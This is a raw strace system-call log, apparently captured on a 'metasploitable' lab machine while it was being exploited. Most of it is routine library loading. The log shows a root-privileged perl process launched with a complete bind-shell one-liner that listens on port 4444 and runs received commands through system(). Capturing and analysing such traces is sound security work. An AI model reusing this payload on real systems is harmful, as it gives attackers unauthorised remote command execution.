10585 07:33:43.370430 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e22000

10585 07:33:43.370430 mmap2(0xb7e36000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e36000

10585 07:33:43.370447 mmap2(0xb7e38000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e38000

10585 07:33:43.370461 close(1)          = 0

10585 07:33:43.370488 munmap(0xb7fc8000, 29913) = 0

10585 07:33:43.370505 open("/etc/ld.so.cache", O_RDONLY) = 1

10585 07:33:43.370518 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10585 07:33:43.370535 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc8000

10585 07:33:43.370545 close(1)          = 0

10585 07:33:43.370555 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.370570 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10585 07:33:43.370584 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10585 07:33:43.370673 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10585 07:33:43.370691 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e18000

10585 07:33:43.370702 mmap2(0xb7e20000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e20000

10585 07:33:43.370718 close(1)          = 0

10585 07:33:43.370730 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10585 07:33:43.370743 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10585 07:33:43.370762 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10585 07:33:43.370859 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10585 07:33:43.370877 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0d000

10585 07:33:43.370889 mmap2(0xb7e16000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e16000

10585 07:33:43.370905 close(1)          = 0

10585 07:33:43.370926 munmap(0xb7fc8000, 29913) = 0

10585 07:33:43.370942 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10585 07:33:43.370956 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10585 07:33:43.370968 _llseek(1, 0, [0], SEEK_CUR) = 0

10585 07:33:43.370979 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10585 07:33:43.370995 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fcf000

10585 07:33:43.371006 _llseek(1, 1624, [1624], SEEK_SET) = 0

10585 07:33:43.371021 munmap(0xb7fcf000, 1624) = 0

10585 07:33:43.371031 close(1)          = 0

10585 07:33:43.371059 getpgrp()         = 3831

10585 07:33:43.371070 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10585 07:33:43.371085 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10585 07:33:43.371100 brk(0x8101000)    = 0x8101000

10585 07:33:43.371131 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10585 07:33:43.371146 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10585 07:33:43.371160 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10585 07:33:43.371198 brk(0x8102000)    = 0x8102000

10585 07:33:43.371224 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10585 07:33:43.371243 stat64("/sbin/AB", 0xbfcd6b28) = -1 ENOENT (No such file or directory)

10585 07:33:43.371255 stat64("/bin/AB", 0xbfcd6b28) = -1 ENOENT (No such file or directory)

10585 07:33:43.371268 stat64("/usr/sbin/AB", 0xbfcd6b28) = -1 ENOENT (No such file or directory)

10585 07:33:43.371280 stat64("/usr/bin/AB", 0xbfcd6b28) = -1 ENOENT (No such file or directory)

10585 07:33:43.371293 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10585 07:33:43.371317 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e436f8) = 10586

10586 07:33:43.371362 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10586 07:33:43.371379 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10586 07:33:43.371392 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10586 07:33:43.371404 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10586 07:33:43.371419 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10586 07:33:43.371435 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10586 07:33:43.371448 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10586 07:33:43.371503 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10586 07:33:43.371517 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10586 07:33:43.371583 exit_group(127)   = ?

4519  07:33:43.387561 waitpid(10585,  <unfinished ...>

10585 07:33:43.387612 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10585 07:33:43.387629 --- SIGCHLD (Child exited) @ 0 (0) ---

10585 07:33:43.387640 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10586

10585 07:33:43.387656 waitpid(-1, 0xbfcd67a8, WNOHANG) = -1 ECHILD (No child processes)

10585 07:33:43.387666 sigreturn()       = ? (mask now [])

10585 07:33:43.387700 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10585 07:33:43.387714 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10585 07:33:43.387725 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10585 07:33:43.387737 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10585 07:33:43.387754 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10585 07:33:43.387765 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10585 07:33:43.387798 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10585 07:33:43.387816 stat64("/sbin/perl", 0xbfcd6b58) = -1 ENOENT (No such file or directory)

10585 07:33:43.387828 stat64("/bin/perl", 0xbfcd6b58) = -1 ENOENT (No such file or directory)

10585 07:33:43.387839 stat64("/usr/sbin/perl", 0xbfcd6b58) = -1 ENOENT (No such file or directory)

10585 07:33:43.387851 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10585 07:33:43.387868 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10585 07:33:43.387891 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10585 07:33:43.387905 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e436f8) = 10587

10587 07:33:43.387944 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10587 07:33:43.387960 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10587 07:33:43.387972 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10587 07:33:43.387984 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10587 07:33:43.387998 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10587 07:33:43.388047 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10587 07:33:43.388078 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10587 07:33:43.388126 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10587 07:33:43.388205 brk(0)            = 0x8153000

10587 07:33:43.388224 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10587 07:33:43.388238 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f11000

10587 07:33:43.388253 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10587 07:33:43.388269 open("/etc/ld.so.cache", O_RDONLY) = 1

10587 07:33:43.388281 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10587 07:33:43.388298 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f09000

10587 07:33:43.388308 close(1)          = 0

10587 07:33:43.388318 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10587 07:33:43.388332 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10587 07:33:43.388345 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10587 07:33:43.388438 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10587 07:33:43.388455 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f05000

10587 07:33:43.388467 mmap2(0xb7f07000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f07000

10587 07:33:43.388482 close(1)          = 0

10587 07:33:43.388493 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10587 07:33:43.388537 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10587 07:33:43.388552 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10587 07:33:43.388655 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10587 07:33:43.388671 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee0000

10587 07:33:43.388682 mmap2(0xb7f03000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f03000

10587 07:33:43.388698 close(1)          = 0

10587 07:33:43.388709 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10587 07:33:43.388723 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10587 07:33:43.388737 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10587 07:33:43.388821 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10587 07:33:43.388837 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7edf000

10587 07:33:43.388849 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec7000

10587 07:33:43.388860 mmap2(0xb7edb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7edb000

10587 07:33:43.388874 mmap2(0xb7edd000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7edd000

10587 07:33:43.388890 close(1)          = 0

10587 07:33:43.388901 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10587 07:33:43.388914 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10587 07:33:43.388927 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10587 07:33:43.389040 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10587 07:33:43.389075 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d78000

10587 07:33:43.389086 mmap2(0xb7ec1000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ec1000

10587 07:33:43.389100 mmap2(0xb7ec4000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec4000

10587 07:33:43.389113 close(1)          = 0

10587 07:33:43.389124 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10587 07:33:43.389137 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10587 07:33:43.389151 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10587 07:33:43.389238 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10587 07:33:43.389254 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d46000

10587 07:33:43.389265 mmap2(0xb7d4f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d4f000

10587 07:33:43.389279 mmap2(0xb7d51000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d51000

10587 07:33:43.389292 close(1)          = 0

10587 07:33:43.389314 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d45000

10587 07:33:43.389326 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d458c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10587 07:33:43.389379 mprotect(0xb7ec1000, 4096, PROT_READ) = 0

10587 07:33:43.389409 munmap(0xb7f09000, 29913) = 0

10587 07:33:43.389421 set_tid_address(0xb7d45908) = 10587

10587 07:33:43.389430 set_robust_list(0xb7d45910, 0xc) = 0

10587 07:33:43.389439 futex(0xbfa5d6f0, 0x81 /* FUTEX_??? */, 1) = 0

10587 07:33:43.389453 rt_sigaction(SIGRTMIN, {0xb7ecb2c0, [], SA_SIGINFO}, NULL, 8) = 0

10587 07:33:43.389466 rt_sigaction(SIGRT_1, {0xb7ecb340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10587 07:33:43.389478 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10587 07:33:43.389491 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10587 07:33:43.389538 uname({sys="Linux", node="metasploitable", ...}) = 0

10587 07:33:43.389615 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10587 07:33:43.389675 brk(0)            = 0x8153000

10587 07:33:43.389684 brk(0x8174000)    = 0x8174000

10587 07:33:43.389727 getuid32()        = 0

10587 07:33:43.389736 geteuid32()       = 0

10587 07:33:43.389746 getgid32()        = 0

10587 07:33:43.389754 getegid32()       = 0

10587 07:33:43.389790 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d24000

10587 07:33:43.389817 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10587 07:33:43.389832 read(1, "\215\200\31<", 4) = 4

10587 07:33:43.389845 close(1)          = 0

10587 07:33:43.389862 time(NULL)        = 1495625623

10587 07:33:43.389903 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfa5d3c0) = -1 ENOENT (No such file or directory)

10587 07:33:43.389920 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfa5d3c0) = -1 ENOENT (No such file or directory)

